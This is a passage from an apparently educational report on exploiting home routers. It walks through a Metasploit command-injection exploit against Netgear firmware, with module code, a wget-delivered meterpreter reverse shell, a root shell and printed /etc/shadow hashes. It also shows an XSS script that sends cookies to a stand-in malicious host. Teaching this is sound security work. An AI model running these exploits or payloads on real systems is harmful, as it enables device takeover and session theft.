&lt;li&gt;set RHOST &amp;lt;RouterIP&amp;gt;&lt;&#x2F;li&gt;
&lt;li&gt;set SRVHOST &amp;lt;Your server&#x27;s IP&amp;gt; if your payload is not hosted on a different system&lt;&#x2F;li&gt;
&lt;li&gt;set LHOST &amp;lt;Your IP&amp;gt;&lt;&#x2F;li&gt;
&lt;li&gt;set PAYLOAD linux&#x2F;mipsbe&#x2F;meterpreter&#x2F;reverse_tcp if you want meterpreter session&lt;&#x2F;li&gt;
&lt;li&gt;exploit&lt;&#x2F;li&gt;
&lt;li&gt;Payload is dropped through wget and a meterpreter session should start&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;After these steps, a meterpreter session is established and hence a backdoor is now persistent in the router. To ensure that one has full access to the router, one may run theshellto get a system shell instead of the meterpreter one, and then proceed to check which user one is acting as with the UNIX command &quot;whoami&quot;. The router&#x27;s system shell should respond withroot, confirming that one does indeed have access to the entirety of the system. This can further be demonstrated by showing the content of the &#x2F;etc&#x2F;shadowfile which contains the passwords of the system. And, indeed, full system access has been achieved as the contents of the file reveal the passwords, albeit hashed. The file is shown truncated below.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;root:$1$SY8xv&#x2F;KM$&#x2F;alQgidqWfIrXjfEygXJi&#x2F;:10933:0:99999:7:::&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;admin:$1$sWd7LBi.$22b3w4YMbBqRLBA5ptDac&#x2F;:10933:0:99999:7:::&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;why-it-works&quot;&gt;Why it works&lt;&#x2F;h4&gt;
&lt;p&gt;In the vulnerability disclosure done by Dominic Chen, several Netgear devices had unauthenticated webpages, which in turn passed input from web forms directly to the commandline into several PHP files, namely &#x27;boardData102.php&#x27;, &#x27;boardData103.php&#x27;, &#x27;boardDataJP.php&#x27;, &#x27;boardDataNA.php&#x27;, and &#x27;boardDataWW.php&#x27;. In other words, it is a relatively classic example of command injection.&lt;&#x2F;p&gt;
&lt;p&gt;In the Metasploit exploit written in Ruby (ide0x90, 2018), one may clearly see how the script establishes a test to see if the firmware is vulnerable by generating random text data as a fingerprinting measure.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;ruby&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #88846F;&quot;&gt;# check for vulnerability existence&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;def&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; check&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  fingerprint&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; =&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; Rex&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;Text&lt;&#x2F;span&gt;&lt;span&gt;.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;rand_text_alpha&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;12&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #88846F;&quot;&gt; # If vulnerability is present(...)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  res&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; =&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; execute_command&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;echo &lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;#{&lt;&#x2F;span&gt;&lt;span&gt;fingerprint&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #88846F;&quot;&gt; # the raw POST response&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  unless&lt;&#x2F;span&gt;&lt;span&gt; res&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    vprint_error &lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;#39;Connection failed&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;    return&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; CheckCode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;Unknown&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  unless&lt;&#x2F;span&gt;&lt;span&gt; res.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;code&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 200&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;    return&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; CheckCode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;Safe&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  unless&lt;&#x2F;span&gt;&lt;span&gt; res.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;get_html_document&lt;&#x2F;span&gt;&lt;span&gt;.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;at&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;#39;input&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt;).&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;to_s&lt;&#x2F;span&gt;&lt;span&gt;.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;include?&lt;&#x2F;span&gt;&lt;span&gt; fingerprint&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;    return&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; CheckCode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;Safe&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;CheckCode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;Vulnerable&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If either the HTTP response code is 200 or the randomly generated text is returned in the same form, the vulnerability check is passed, and hence one may proceed to exploit the system through the following command:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;ruby&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #88846F;&quot;&gt;# execute a command, or simply send a POST request&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;def&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; execute_command&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FD971F;font-style: italic;&quot;&gt;cmd&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FD971F;font-style: italic;&quot;&gt; opts&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; =&lt;&#x2F;span&gt;&lt;span&gt; {})&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  vars_post&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; =&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;  &amp;#39;macAddress&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;#{&lt;&#x2F;span&gt;&lt;span&gt;datastore[&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;#39;MAC_ADDRESS&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;#{&lt;&#x2F;span&gt;&lt;span&gt;cmd&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;  &amp;#39;reginfo&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;#39;1&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;  &amp;#39;writeData&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;#39;Submit&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;  send_request_cgi&lt;&#x2F;span&gt;&lt;span&gt;({&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;    &amp;#39;method&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;#39;POST&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;    &amp;#39;headers&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt; {&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;#39;Connection&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;#39;Keep-Alive&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;    &amp;#39;uri&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; normalize_uri&lt;&#x2F;span&gt;&lt;span&gt;(target_uri.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;path&lt;&#x2F;span&gt;&lt;span&gt;),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;    &amp;#39;vars_post&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt; =&amp;gt; vars_post&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;rescue&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;Rex&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;ConnectionError&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;  fail_with&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;Failure&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;Unreachable,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;#{&lt;&#x2F;span&gt;&lt;span&gt;peer&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; - Failed to connect to the target!&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #88846F;&quot;&gt;# the exploit method&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;def&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; exploit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #88846F;&quot;&gt;  #run a check before attempting to exploit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  unless&lt;&#x2F;span&gt;&lt;span&gt; [&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;CheckCode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;Vulnerable].&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;include?&lt;&#x2F;span&gt;&lt;span&gt; check&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fail_with &lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;Failure&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;font-style: italic;text-decoration: underline;&quot;&gt;::&lt;&#x2F;span&gt;&lt;span&gt;NotVulnerable,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;#39;Target is most likely not vulnerable!&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;  end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;  execute_cmdstager&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;linemax: 2048&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #88846F;&quot;&gt; # maximum 130,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The aforementioned code constructs a POST requests which contains a MAC address specified (or randomised) by Metasploit, but along with it also the command injection as specified by the &quot;cmd&quot; positional argument. This data is packaged into thesend_request_cgi() method and is then run. From there, the script can call Metasploit and execute the command stager, thus handing back the control to Metasploit and subsequently receive the connection from the reverse shell.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;reverse-shell&quot;&gt;Reverse shell&lt;&#x2F;h4&gt;
&lt;p&gt;The final stage is to select one&#x27;s payload of choice, and since the Ruby implementation&#x27;s author recommended &quot;linux&#x2F;mipsbe&#x2F;meterpreter&#x2F;reverse_tcp&quot;, this is what will be used. This meterpreter shell allows for specifying which IP address the reverse TCP shell should be communicating with. It is therefore important to note here that this IP address is that of the virtualised network adapter created by FAT, not one&#x27;s actual physical network adapter. Finally, one may run the exploit and deliver the payload to the router.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Started reverse TCP handler on 192.168.0.2:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Using URL: http:&#x2F;&#x2F;0.0.0.0:8080&#x2F;g5opHCWiD2Q&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Local IP: http:&#x2F;&#x2F;172.24.82.82:8080&#x2F;g5opHCWiD2Q&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Client 192.168.0.100 (Wget) requested &#x2F;g5opHCWiD2Q&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Sending payload to 192.168.0.100 (Wget)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Sending stage (1256712 bytes) to 192.168.0.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Meterpreter session 1 opened (192.168.0.2:4444 -&amp;gt; 192.168.0.100:54204) (...)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Command Stager progress - 100.00% done (115&#x2F;115 bytes)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[*] Server stopped.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;meterpreter &amp;gt; ls&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Listing: &#x2F;home&#x2F;www&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;==================&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Mode Size Type Last modified Name&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;---- ---- ---- ------------- ----&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;100444&#x2F;r--r--r-- 862 fil 2020-04-07 04:12:55 +0200 BackupConfig.php&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;100444&#x2F;r--r--r-- 4385 fil 2020-04-07 04:12:55 +0200 UserGuide.html&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;100444&#x2F;r--r--r-- 900 fil 2020-04-07 04:12:55 +0200 background.html&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;100444&#x2F;r--r--r-- 3646 fil 2020-04-07 04:12:55 +0200 boardDataNA.php&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;100444&#x2F;r--r--r-- 3638 fil 2020-04-07 04:12:55 +0200 boardDataWW.php&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;100444&#x2F;r--r--r-- 393 fil 2020-04-07 04:12:55 +0200 body.php&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;After getting the meterpreter shell, one may, amongst many other functions, traverse the directories, upload files and modify routing tables. As mentioned above, one may also enter into the system shell instead and carry out one&#x27;s work with more traditional UNIX commands if one so wishes.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;2-3-xss&quot;&gt;2.3 XSS&lt;&#x2F;h3&gt;
&lt;p&gt;Cross-site scripting (XSS) is a common tactic when it comes to injecting code into an entity using web technology. In its most basic form, an attacker can send a link which contains malicious code to a victim. This code is subsequently run either upon clicking the link or in some cases, by simply visiting a site which contains the malicious piece of code.&lt;&#x2F;p&gt;
&lt;p&gt;A writeup specifically targeting the security of common SOHO routers was made by Craig Heffner and Derek Yap. In this writeup, it was found that SOHO routers had a general rather poor security. Amongst the vulnerabilities discovered in these routers were various kinds of XSS; both authenticated and unauthenticated (Heffner &amp;amp; Yap, 2009). Similarly, researchers from the Ruhr University Bochum in Germany investigated home routers with a specific focus on XSS, which proved, again, that home routers have generally poor protection against XSS attacks. The following is an example of an XSS attack adapted from an example by OWASP (OWASP, 2020):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;javascript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;SCRIPT&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; type&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;=&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;text&#x2F;javascript&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  var adr = &amp;#39;http:malicious.com&#x2F;evil.php?cakemonster=&amp;#39; +&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  escape(document.cookie);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;lt;&#x2F;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;SCRIPT&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In the example above, a web cookie is stolen by injecting a malicious script (being evil.php) into a valid website. Further scripting can then be done so that a malicious actor can steal the cookies of an ongoing web session, and hence compromise the session. Such code may be sent to a victim either through, a website, web application (ia. Electron applications) or their e-mail. Routers, being the central hub for the flow of data, are therefore vital to secure. And given the aforementioned research into the generally poor security that plagues these devices, more research and attention is needed to secure the SOHO networking environment.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;As has been shown, it is fairly trivial to exploit a router, either through the use of existing tools such as Metasploit or though the vast number of unescaped information that will eventually lead to vulnerabilities such as XSS. The principle for this topic is clear: no matter what the device is, the price to pay for not having secure devices can be grave, even if the device belongs to a small home network.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;references&quot;&gt;References&lt;&#x2F;h2&gt;
&lt;p&gt;Chen, D. (2016). D-link &#x2F; netgear firmadyne command injection &#x2F; buffer overflow. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;packetstormsecurity.com&#x2F;files&#x2F;135956&#x2F;D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html&quot;&gt;https:&#x2F;&#x2F;packetstormsecurity.com&#x2F;files&#x2F;135956&#x2F;D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Common Vulnerabilities. (2020). Cve - common vulnerabilities and exposures. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;cve.mitre.org&#x2F;&quot;&gt;https:&#x2F;&#x2F;cve.mitre.org&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
